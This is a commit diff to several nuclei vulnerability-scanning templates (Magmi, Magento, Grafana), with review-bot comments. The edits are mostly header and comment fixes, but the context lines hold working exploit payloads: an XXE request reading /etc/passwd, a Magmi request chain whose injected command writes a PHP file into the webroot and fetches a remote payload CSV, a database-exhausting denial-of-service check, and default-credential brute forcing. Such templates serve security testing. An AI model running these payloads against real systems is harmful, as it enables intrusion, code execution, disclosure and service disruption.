Misc (minor)
Related nuclei tickets: #259 (dynamic key-value field support for template information), #940 (new infos in template), #834, RES-84patch-1
parent
002e8db616
commit
2a320412bf
|
@ -53,7 +53,7 @@ git checkout -b template_branch_name
|
||||||
git add .
|
git add .
|
||||||
```
|
```
|
||||||
|
|
||||||
- To commit give a descriptive message for the convenience of reveiwer by:
|
- To commit, give a descriptive message for the convenience of the reviewer by:
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
# This message get associated with all files you have changed
|
# This message get associated with all files you have changed
|
||||||
|
|
|
@ -6,8 +6,9 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
|
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
|
||||||
tags: cve,cve2017,magmi,xss
|
tags: cve,cve2017,magmi,xss
|
||||||
reference: https://github.com/dweeves/magmi-git/issues/522
|
reference:
|
||||||
# Download:-https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
|
- https://github.com/dweeves/magmi-git/issues/522
|
||||||
|
- https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
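Review bot: The `description:` value is a single 200+-character plain scalar; in the template it would read better as a folded block (`description: >-` with the text wrapped at around 100 columns), and "insufficient filtration of user-supplied data" reads more naturally as "insufficient filtering". The new `reference:` list links the issue thread and the 0.7.22 release zip, but not the CVE/NVD record for the `id` this template carries, which is normally the first entry a reviewer looks for. The `info:` mapping starts outside the hunk.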
@ -14,7 +14,7 @@ requests:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/v2/api/product/manger/getInfo"
|
- "{{BaseURL}}/v2/api/product/manger/getInfo"
|
||||||
headers:
|
headers:
|
||||||
Content-type: "text/xml"
|
Content-Type: "text/xml"
|
||||||
body: |
|
body: |
|
||||||
<!--?xml version="1.0" ?-->
|
<!--?xml version="1.0" ?-->
|
||||||
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
|
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
|
||||||
|
|
|
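Review bot: The first line of `body:` wraps the XML declaration in a comment (`<!--?xml version="1.0" ?-->`), which looks like a copy-paste artifact from a rendered HTML page; most XML parsers will skip the comment and still process the DOCTYPE, but the intended prolog is `<?xml version="1.0" ?>`. The DOCTYPE declares an external entity on `file:///etc/passwd`; the entity reference and the matchers are outside the hunk, so I assume the check matches on passwd-style content, which deserves a comment such as `# Linux-specific: reads /etc/passwd through the external entity`. The `body:` block scalar continues past the hunk.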
@ -19,7 +19,7 @@ requests:
|
||||||
Accept-Encoding: gzip, deflate
|
Accept-Encoding: gzip, deflate
|
||||||
X-Requested-With: XMLHttpRequest
|
X-Requested-With: XMLHttpRequest
|
||||||
X-Prototype-Version: 1.5.1.1
|
X-Prototype-Version: 1.5.1.1
|
||||||
Content-type: application/json; charset=UTF-8
|
Content-Type: application/json; charset=UTF-8
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
Connection: close
|
Connection: close
|
||||||
Referer: {{BaseURL}}
|
Referer: {{BaseURL}}
|
||||||
|
|
|
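Review bot: The request pins `Accept-Encoding: gzip, deflate`, so a server that honours it returns a compressed body; unless the scanner transparently inflates responses when the header is set by the template itself (I cannot confirm that from here), any body matchers on this request would silently never match. If inflation is not guaranteed, dropping that one header is the safer choice — the `X-Requested-With` and `X-Prototype-Version` headers are enough to mimic the original client. The `headers:` mapping starts outside the hunk.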
@ -17,14 +17,14 @@ requests:
|
||||||
- |
|
- |
|
||||||
POST /magmi/web/magmi_saveprofile.php HTTP/1.1
|
POST /magmi/web/magmi_saveprofile.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
|
profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
|
||||||
- |
|
- |
|
||||||
POST /magmi/web/magmi_run.php HTTP/1.1
|
POST /magmi/web/magmi_run.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update
|
engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update
|
||||||
|
|
|
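Review bot: The first request's `REINDEX:phpcli` value writes `<?php phpinfo();` to `/var/www/html/magmi/web/info.php` on the target and the second request runs the import that executes it, so a successful scan leaves a world-readable phpinfo() page in the webroot that discloses server configuration to anyone who finds it. That side effect, the hard-coded webroot and the outbound fetch deserve a comment above `requests:`, e.g. `# Intrusive: drops info.php (phpinfo) into /var/www/html/magmi/web/ and needs outbound HTTPS to raw.githubusercontent.com for the CSV datasource`. The `CSV:remoteurl` value is also wrapped in literal `[` `]` brackets, which are sent as part of the URL unless Magmi strips them — presumably a leftover from the payload's write-up. The `requests:` list and the matchers continue outside the hunk.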
@ -10,7 +10,7 @@ info:
|
||||||
|
|
||||||
# Response code 503 indicates a potential successful "Too many connections" error
|
# Response code 503 indicates a potential successful "Too many connections" error
|
||||||
# While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php
|
# While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php
|
||||||
# whith default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=)
|
# with default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=)
|
||||||
# Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100
|
# Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
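Review bot: A 503 on its own is a weak indicator of a "Too many connections" condition — any overloaded or restarting backend returns it — and the comments above `requests:` never state that exhausting MySQL connections is a denial of service against the target. I would add `# Intrusive: this check deliberately exhausts the target's MySQL connection pool; run only with explicit authorization` next to the existing notes and, if the matchers (outside the hunk) only test the status code, pair it with a body match on the connection-error text. The `requests:` list starts at the end of the hunk and continues beyond it.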
@ -23,8 +23,7 @@ requests:
|
||||||
- prom-operator
|
- prom-operator
|
||||||
- admin
|
- admin
|
||||||
|
|
||||||
# Added default grafana and prometheus user.
|
# Added default grafana and prometheus user. reference[2]
|
||||||
# Source: https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
|
|
||||||
|
|
||||||
attack: sniper
|
attack: sniper
|
||||||
|
|
||||||
|
|
|
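Review bot: The rewritten comment `# Added default grafana and prometheus user. reference[2]` points at a position in the `reference:` list that lives outside this hunk, while the commit drops the Stack Overflow URL that used to sit beside it; a positional cross-reference goes stale silently the moment someone reorders or prepends a reference. A self-contained comment naming the source, e.g. `# Default grafana/prometheus users, per the Stack Overflow thread listed under reference:`, survives edits to that list. The payload lists around `attack: sniper` are only partly visible, so I cannot tell whether `prom-operator` and `admin` sit in the username or the password list.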
@ -5,6 +5,8 @@ info:
|
||||||
author: TechbrunchFR
|
author: TechbrunchFR
|
||||||
severity: info
|
severity: info
|
||||||
description: Identify Magento
|
description: Identify Magento
|
||||||
|
reference:
|
||||||
|
- https://devdocs.magento.com/guides/v2.4/graphql/
|
||||||
tags: magento
|
tags: magento
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
@ -14,8 +16,7 @@ requests:
|
||||||
- '{{BaseURL}}/graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+}'
|
- '{{BaseURL}}/graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+}'
|
||||||
|
|
||||||
# There might be a better way to do that, the idea of this check is that Magento might be behind some kind of proxy when
|
# There might be a better way to do that, the idea of this check is that Magento might be behind some kind of proxy when
|
||||||
# consumed by a SPA/PWA app so we need a valid GraphQL query from Magento to check
|
# consumed by a SPA/PWA app, so we need a valid GraphQL query from Magento to check reference[1]
|
||||||
# https://devdocs.magento.com/guides/v2.4/graphql/
|
|
||||||
|
|
||||||
matchers-condition: or
|
matchers-condition: or
|
||||||
matchers:
|
matchers:
|
||||||
|
|
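Review bot: Same positional-reference problem here: `… to check reference[1]` replaces the inline devdocs URL with an index into the `reference:` list, which is in a different hunk and can be reordered without anyone noticing the comment no longer matches. The `@ -5,6 +5,8 @@` hunk adds that URL as the only entry today, so the index happens to be right, but a comment that names what it cites (`# see the Magento GraphQL docs listed under reference:`) is robust to later edits. `customerDownloadableProducts` is a customer-scoped query, so the fingerprint presumably relies on Magento's characteristic error response for an unauthenticated caller — worth stating in the comment, since the matchers are outside the hunk.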